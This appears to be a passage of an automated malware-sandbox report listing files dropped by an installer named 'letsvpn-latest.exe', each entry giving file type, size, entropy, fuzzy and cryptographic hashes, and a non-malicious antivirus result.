                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.9935188579764525
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:WeWnoWJhqWOHlLf2KQcvBZ9pM9S+ShjmM6IGBkSpqH:Wnpq3b2KZBZGS+ST6nk3H
                                                                                                                                                                                                  MD5:258B30BAD31A634788ADCE0968A95E69
                                                                                                                                                                                                  SHA1:13ED037797D8283CA176C3DB00E93B2182039D7E
                                                                                                                                                                                                  SHA-256:E5D1B116F6B5206463449683167E9ECCC3CFF8626BBE1CAAF7834C6355D27FDF
                                                                                                                                                                                                  SHA-512:3471F04AD313A453BE4AD8116D2CE6B2A2D32630348D906E48862D89F22C221CDB44F57BA87FED1E57D1DC7B7E95A1D9080B4D07793F48D800EC9F3C16D76F5D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):34336
                                                                                                                                                                                                  Entropy (8bit):6.393304688632124
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:wVdeQes+wUTHP0G3cmL+7NQ1OaY74E2q3b2KZBZaS+ST6nkw:wXeQes+wUTHPbANP7t53qKA/mC
                                                                                                                                                                                                  MD5:302C378EA0267FBD51A039D4CD3D61E2
                                                                                                                                                                                                  SHA1:41A362A72EF0C135C00521F8564DF35F41650995
                                                                                                                                                                                                  SHA-256:62FC2DD05AB95436C22A43A74C3C2DEFE3E4650F44830F4DA1732BE206EB4239
                                                                                                                                                                                                  SHA-512:F929BBF9CEDEDCD6013876752ABF3E04EC8AF4E303910F7B25864036711DAE4227FE78B057CC640DD6DA336CF3EB41CAA188E698EE92B3BF96400F9495A39758
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.958901473799381
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:x6oWJjWehqWOHlLf2KQcvBZ9NY07S+ShjmM6IGBkSoy0z:x6v/q3b2KZBZo07S+ST6nkTX
                                                                                                                                                                                                  MD5:3DA8C454B5F9E5F3B22603C2B681BD33
                                                                                                                                                                                                  SHA1:08DECEF175B8D1F178953999274847DBAF0D03D7
                                                                                                                                                                                                  SHA-256:B67ED6607475FC7F7A69AC0C62241062A52DC5F831F3433ED760F52F1083F993
                                                                                                                                                                                                  SHA-512:1AAB49A79CCC903E7486C0848023225FFF445F1A1F1B0EE31BC609D9F6F9266809A1F372388E68ECD54CF8EBB35A44E9E4E9419AA9B815346305780E5DA3DCE2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):43040
                                                                                                                                                                                                  Entropy (8bit):6.064632964448439
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:FTyj5cKJfE+MJnnvnL0jxq3b2KZBZa89JtS+ST6nkeX:FTC5Ve0jE3qK7/mkX
                                                                                                                                                                                                  MD5:AF2D1149CA10620B40A349F6B67F82FD
                                                                                                                                                                                                  SHA1:39C24A88A8F6E26F4238DEE7D39266A30C9E315A
                                                                                                                                                                                                  SHA-256:E7402498B6412FABBD15287DE3792685617F2A1146014BE60AC40965652B2165
                                                                                                                                                                                                  SHA-512:5244D538995578C74CD656F79A65175AE60451DBCB3E0CB1F0F9E36A971A98AC31D8A5014871708F65C724A13CAF3814CA7ED7B5145F6F8EF38A37481CA9CC2A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.889108022269452
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:pqk53/hW3fZ+zWt4hqWOHlLf2KQcvBZ91aiS+ShjmM6IGBkSgz:pqk53MJoq3b2KZBZnS+ST6nkX
                                                                                                                                                                                                  MD5:5E7BDFD79859F22E5D9F5DD5F026517E
                                                                                                                                                                                                  SHA1:A6618DC790291C2E4CF7C26C336EBCF33D619B88
                                                                                                                                                                                                  SHA-256:CA66E00B269BE8D63EF8CEA8BB04CB7E3D9AA9662B83ABF7FBEEC1D3CC912BA8
                                                                                                                                                                                                  SHA-512:F1EC165581CB09180C383F7F43FC1E084AE73CED9B2533016E444D04E4AA78A64233F8EAE3CF4708B8E53E5D422A2A4B12CDDA05517FC1E73ED5964E540953CA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):19488
                                                                                                                                                                                                  Entropy (8bit):6.776949657141779
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:lFCc4Y4OJWfOWqWWOW1hqWOHlLf2KQcvBZ9o0S+ShjmM6IGBkSUA:nCcyCLq3b2KZBZ1S+ST6nk9A
                                                                                                                                                                                                  MD5:4CBEB58C5611362601BDC06540422F1D
                                                                                                                                                                                                  SHA1:D3CB8204EF113D8817DB547CE8EC36FD43CBCF5E
                                                                                                                                                                                                  SHA-256:F63B8FCF9EBE4C0344B5D95EE65ECF83850C8E55A2DD4280615EA0B8DEB92021
                                                                                                                                                                                                  SHA-512:3538E7F9B604D060A18E8556545F5FEC5F53D9348898556FAFF38126D3F10B7300A08650ED99323EED123449178C1E461E80D69CA5C2DE9806BDCA8E145FCB7C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.9834026919899745
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:CAWxMWRhqWOHlLf2KQcvBZ9/UWS+ShjmM6IGBkSxK:CvFq3b2KZBZyWS+ST6nkuK
                                                                                                                                                                                                  MD5:A0CFB7229C44350D8B167F809BCC5C82
                                                                                                                                                                                                  SHA1:C7322697682880AE761D49FBD54523ECAB2DCDD4
                                                                                                                                                                                                  SHA-256:491D8D66F1C221AFC45A78C722E440D1954E21FB0C7DF124D172D0E8D4A1EAC7
                                                                                                                                                                                                  SHA-512:38D5B7AB41341237BB8C3014083443C934DF9952C883D46F26B9A52A8C84EE89DE128887B4EF833E217BE9A022DDE8AC2F4691EEBB02324B2D34059EA6695E23
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.958092237087259
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:+AlcWHaWZhqWOHlLf2KQcvBZ9ooS+ShjmM6IGBkSse:P9zq3b2KZBZ9S+ST6nkne
                                                                                                                                                                                                  MD5:DF525B438444B76BCB156B66E7161E84
                                                                                                                                                                                                  SHA1:3DC313D7F3CC9CAF2E07B958BFDCD00DCB0DCF37
                                                                                                                                                                                                  SHA-256:3AD983B3F53F29734D1A7BFA34DF9D12890641AE701D7491380BA3F96160EC29
                                                                                                                                                                                                  SHA-512:96BF743CFA0A5E128213BF52B61F818ABD76AD48C9C23E042BF816BF2884F3203FB6678245CA21CE6D9B9B0D5648EDB239E7A5C19B87E1E84283B0738B751575
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.891837867115112
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:l8IZnWlNWxhqWOHlLf2KQcvBZ926lS+ShjmM6IGBkSQu:GUywq3b2KZBZXS+ST6nkTu
                                                                                                                                                                                                  MD5:849EF7F81E30B7588D0DE5E5D6BD8E40
                                                                                                                                                                                                  SHA1:F9D68F2AFEBCF43B9F70040CB312FEEC2C1DA8A6
                                                                                                                                                                                                  SHA-256:63B6ADB455FADEB5DCD50A54013EFB4FF38229FB7880876E808A682811B02C49
                                                                                                                                                                                                  SHA-512:D00A7E17D6CF293229CF93198D7C5607FBB47BA99A75AEBA1761057549F0B81E316B8B7E319FFBA9B421E2837261D79355947DFEACEC9FC1BE4C387FF714B7B3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):27168
                                                                                                                                                                                                  Entropy (8bit):6.589374706387424
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:qQq33333333kX+TBi8Bq3b2KZBZUS+ST6nkz:tu1i803qKi/mZ
                                                                                                                                                                                                  MD5:BFC312F081410FB6DA38D96C81F1DBA0
                                                                                                                                                                                                  SHA1:AB97835A609001CE1A1A423E60C92F50DFB30E2F
                                                                                                                                                                                                  SHA-256:2164BC42B0909DF2674F4F301C24B865FDF3328D6DF4A11E34C29A2D13B16F51
                                                                                                                                                                                                  SHA-512:94D3FE930981A7E77BC116178F5328A1F666929FB9E6800C5AC8B2870CFCDD52E40AC92D260F1C5197065ADE6DFACE2FC5E9F591153AFC77642693AC4A491753
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):55840
                                                                                                                                                                                                  Entropy (8bit):5.935591964243442
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:fJbgUxvrIn01EkO/69KzwmOiGeCcSP8UIre3qK6/mj:f1xvrInsEkO/AKzwm3C0UOe2/M
                                                                                                                                                                                                  MD5:321AA362C269B7998E487EABBA76DF89
                                                                                                                                                                                                  SHA1:59717CD20D72BD4067D988BD098667AD328CA25F
                                                                                                                                                                                                  SHA-256:AF6EFED5F99926E2948F49CDA00D6EF52FEE0BD6006A5FF292A8D165C6C5054A
                                                                                                                                                                                                  SHA-512:8F73EED30895D32724B6731C1031632F070C8E695CEEA4644EAD4F0CB9D546AF7CBA26EC806033A2BC4661160123D4F86EB8A7B21767A7C716E91E7192758799
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.9586207641045785
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:G28YFlXulWY/WJhqWOHlLf2KQcvBZ9mH6S+ShjmM6IGBkSB7IT:G0qCq3b2KZBZMaS+ST6nkhT
                                                                                                                                                                                                  MD5:2546F1626A6DA255A1BA53361C9BACAB
                                                                                                                                                                                                  SHA1:5F2BFC8C263EC4C16EECE35AF449BF796A38EC09
                                                                                                                                                                                                  SHA-256:4EF0AEE89AFE95C84FD39CD5E6B3C0615BEC80DD9F2A3E032431664054199B43
                                                                                                                                                                                                  SHA-512:D6F937F3617E365E697A42624D25608F151FE1838C01EBCDEDFAA98F3318939FB6AE61A954877FDCD18999E7F786E0C8875ACDA856E91B201D21E6C2FC101746
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17952
                                                                                                                                                                                                  Entropy (8bit):6.846896849834963
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:duMLcdQ5MW9MWWhqWOHlLf2KQcvBZ9Szk6hFWS+ShjmM6IGBkSb:8OcSp8q3b2KZBZV6SS+ST6nk4
                                                                                                                                                                                                  MD5:6D457DEF3C837293F37CA120532A14DB
                                                                                                                                                                                                  SHA1:8884226BCB76B3335EA1DDCC37C93304B9D43A2E
                                                                                                                                                                                                  SHA-256:DACB18FB653B44FFF1822A7048DECF50A45C009F86D5730646B168E06D8E3707
                                                                                                                                                                                                  SHA-512:1B43B755F1A9A374329E0BA9C7CAC46E1EA25768284E38A8D5094F0416FEBFE919C02D37AD4FBF2D21328A8592B159807931A683869BC519EEBE86D4E36A5C3C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.918920376522975
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:2eZ7RqXWDRqlRqj0RqFW1hqWOHlLf2KQcvBZ97dPFHhS+ShjmM6IGBkSI:X9qKqjqjuqMq3b2KZBZv3S+ST6nkH
                                                                                                                                                                                                  MD5:BA85D809EC7A22051C54AF57D0AD7C6E
                                                                                                                                                                                                  SHA1:3A6D7B63940F0BC004C119EE802B2ABC0EF6D131
                                                                                                                                                                                                  SHA-256:C22CEC6D7BB7133464E72DD27F86C863717FDBB20B03B7A6992F84C41C9B0664
                                                                                                                                                                                                  SHA-512:09229B959088298EE827D9C6A0360C843B1EEF9FA9BC197582DD13988A7EFC86AB00DE0EC74B3A1E659968094FB97D9F61B880C36C17AC097B106A9816AE4F0C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21536
                                                                                                                                                                                                  Entropy (8bit):6.733022853099171
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:5NBMbljRC+lgfS1RPWYR1Rw0R9WYRPWYRDRj0R9W4hqWOHlLf2KQcvBZ91fS+ShO:5vMhF2SzNzwu/Nljuzq3b2KZBZnS+ST8
                                                                                                                                                                                                  MD5:374B265EEB90FDED2AB11EE7543E2A0B
                                                                                                                                                                                                  SHA1:EC1EE2B9AB15AC348ABF1930ECCD677C2026AC33
                                                                                                                                                                                                  SHA-256:551DC892D640C22AD5D4A31991E053C753D59DFED8E9BA492F360FB8487BE70B
                                                                                                                                                                                                  SHA-512:D206BB30BB66CA6CE206B540791EB1BEC94B47F1A9E19F610DF5F207690E2E3D252F98571C743A2A72DC7C49AA5A6A5D56FBEC051B2E6E88AA36698B530145B4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.9967929370197135
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:QZ4RLWdRfRJ0RZWJhqWOHlLf2KQcvBZ9k1S+ShjmM6IGBkSHVz:QZK0pJucq3b2KZBZMS+ST6nkkN
                                                                                                                                                                                                  MD5:B4DE713393E243E6B74ABA592A87BC70
                                                                                                                                                                                                  SHA1:D7B85D8EC0E3A2AE2AD7548E2AEFBC0FBEA0B3D3
                                                                                                                                                                                                  SHA-256:22B10C588D9D3BFD3F14551E26891880C3F10D30D9AE24907DF81155843619BF
                                                                                                                                                                                                  SHA-512:4968FD0B2DA1DC05D9B5ADB08E2DF79FDD232212BA59D0726FB1FE2C0A4E72E9DA83E2986A60E6CE20A05B4BFBB061A72F2E4DD4F6B6A6BB6AFDCED1845B4E53
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.908181305951868
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:gYWsmWShqWOHlLf2KQcvBZ9dWS+ShjmM6IGBkSV:g2uq3b2KZBZCS+ST6nkq
                                                                                                                                                                                                  MD5:07F83DA30A4155730B722D028D2E7A5D
                                                                                                                                                                                                  SHA1:DA2085605B64741D85F5EDEF8D4E45C3D0A24AEA
                                                                                                                                                                                                  SHA-256:ACA4744E64C8EDAB708CD3193B4315C937CEEE3FC82CC7C35EF195E229EB8DFC
                                                                                                                                                                                                  SHA-512:0642BDF49C4CC0EA90E79770B64D5007A3CE8A37D9F7A69E1AD7522C43F0D7DFEEC365B1D525470442A6A24000F170F6BC9B1DBAA0FD9BE192B15F7ABDF6D3C4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):106528
                                                                                                                                                                                                  Entropy (8bit):6.4118107859279405
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:Jvc/U5yNq2oS4Zd0LE3YigSFvhoZO2K3aAYH2TfXmNoJXv3qKe/mvW:Fgk1tiLMYiDFvxqrWDWNoJXv6/AW
                                                                                                                                                                                                  MD5:CF91C18B32DA597C9E15105999487628
                                                                                                                                                                                                  SHA1:C863AC3BAB1FB4EB227E5722D0455F9A3B131B35
                                                                                                                                                                                                  SHA-256:4B34A0DEB1F888A8B48B39C6B4073B197344FB9B56DA1887767569937AA3B488
                                                                                                                                                                                                  SHA-512:7518606F44E43108C5666C09845EC5B5FE99BC84FFFD3DC6A830B840DBA74950FFD73609DAC0F6AE61746EFD691866B805A88B9B30968C9E725C39434D7A622F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):31264
                                                                                                                                                                                                  Entropy (8bit):6.48384033148274
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:+CN9VYp/OiRcnZIfk8P/q3b2KZBZQCS+ST6nkK:+Q9ycnn0S3qKP/mc
                                                                                                                                                                                                  MD5:F41DE27679C17CAA34164449186B0D6C
                                                                                                                                                                                                  SHA1:5D911884D1D162BEAD6D5A3921620799D8A4A0B8
                                                                                                                                                                                                  SHA-256:A48D066FA2F1861EB5218A2149FF99DE13CC431699CCC5B476A9E3C270F9B7B9
                                                                                                                                                                                                  SHA-512:92C64376C72BE45DA44E29F2638BC69361D9C3DA7079CAFF3924DBD106E35EE1DF4D833F94876F2E17A8904544F4A7D30E707529B67454E7DA5166492F0ACB34
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.965595445677437
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:IKcuz1W1cWthqWOHlLf2KQcvBZ9KOVS+ShjmM6IGBkSq9:Iu81q3b2KZBZ3VS+ST6nkz
                                                                                                                                                                                                  MD5:F39321A5CFD4B2B4DF5B7297002CE169
                                                                                                                                                                                                  SHA1:9E9B762DE62DCE2854455BC9679BAC99C542223B
                                                                                                                                                                                                  SHA-256:7CD078C1EA5D6FD8225084858E2D09F9F6F4DEC433A8930ACBCD2C343D2DAD12
                                                                                                                                                                                                  SHA-512:0649CFAB684C6BC7FDD392033C0DA94D7646ABF9853BFBBBF1CCCD840A98996AB44E4375DF460522A4343A0B5AD30FB9FA93504F75FFEB5DBF2377AF76E9BDAA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.969722484889954
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:G+SWikWghqWOHlLf2KQcvBZ9e+dS+ShjmM6IGBkStci5:G+eKq3b2KZBZDdS+ST6nkI
                                                                                                                                                                                                  MD5:F934333E05C58E175207663C777901CC
                                                                                                                                                                                                  SHA1:2224BF0028BD1F061823F9730ACB82EF91A59D30
                                                                                                                                                                                                  SHA-256:26033A1C20A6BC7C8C69DE577B9F3B47249F6EE7B28747A972E160810E4A10CA
                                                                                                                                                                                                  SHA-512:799B511DB5784587B67A1551CF1B24A9F8DC37AD2D0D1378D0A89241F44821ED3F47E22118EE9427EF5E766F79F64C41C64F6C43F1F60FC58D7669E2738EF59A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):7.005950112883477
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:piAWzgWj6hqWOHlLf2KQcvBZ9JOkXS+ShjmM6IGBkSF8b:wtkq3b2KZBZukS+ST6nkIU
                                                                                                                                                                                                  MD5:DDE1CE18B4DB03BE26C9DC5D1364B9ED
                                                                                                                                                                                                  SHA1:CA068FE5A6187CED9DC64C2F861D405A78D498BA
                                                                                                                                                                                                  SHA-256:67908E6B6AEC9096E22708584061BCE00FC0470EE8BE85754533F32631C49172
                                                                                                                                                                                                  SHA-512:C28EB8E74C6A730B94FEF3667EDFEB37C22F2B307882589020A33B290ED3BF35CC120677A6D7AA1FD27F3380381651A4948B160C474C473F4C8C0B62A6281F37
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.970704080069797
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:mBLRWbYWAhqWOHlLf2KQcvBZ9LAuDS+ShjmM6IGBkSHN:mB2Oq3b2KZBZTS+ST6nkgN
                                                                                                                                                                                                  MD5:8C374646D6CFE62A64F99AC6883D769C
                                                                                                                                                                                                  SHA1:CC08A69E0618A534B15CA59F90CBD775FC286EB4
                                                                                                                                                                                                  SHA-256:1B1FBF9870296C136AB3EAD15975B2F5B764838FB576A24E002BBCD68B0C1AC7
                                                                                                                                                                                                  SHA-512:AEDA2CD3E7F98B663EEF05B8D160B66E7F0BFEF9628631DB3144241739BB2079B207FCA040087ED76970425F05A61AD74E8C34C284B0628476527AAED8B4A499
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.956841147765326
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:iHW4/Wv7hqWOHlLf2KQcvBZ95YuS+ShjmM6IGBkSw:irGtq3b2KZBZwuS+ST6nk3
                                                                                                                                                                                                  MD5:121900FAF0866DA1543E360231896FB5
                                                                                                                                                                                                  SHA1:D2511193D20B2FC38A3CEAA1E6076025AEBDC26B
                                                                                                                                                                                                  SHA-256:BA84F39643E8D9047DE7659D4F754D92D945D89F22B805B0732862CAF25AD315
                                                                                                                                                                                                  SHA-512:2F0B33A4E792CD53BCCA605BF5BB3507ABB6755622D8F51948F03AE201695AE2689CD78DB1E8BDDED596E997653F6966C8A54D52F5085EA25A27C7871615FBC8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):7.010818325491102
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:4vk7hWmCWthqWOHlLf2KQcvBZ9kzS+ShjmM6IGBkSZ:4s7/Pq3b2KZBZWS+ST6nkq
                                                                                                                                                                                                  MD5:FC146383703882794B07AE23F5A7A66E
                                                                                                                                                                                                  SHA1:32ECFBCB81732FA23DAA8E3259D1DAB2BB5F82AB
                                                                                                                                                                                                  SHA-256:56F7B1883AB592EA9E8505E62AA96E58C4F5E1437BCC4CFC53B975AE945EF646
                                                                                                                                                                                                  SHA-512:A3E49D21BC39B6C49B79DB85F2C09A7CB3509021D51EFD4A46A08D1C8A111CF997F8461D9BFD944AB4DF5B7EEFBD6187CCB7242831E2D461F2E5C75E7BB82EAC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):48672
                                                                                                                                                                                                  Entropy (8bit):5.996358920818446
                                                                                                                                                                                                  Encrypted:false
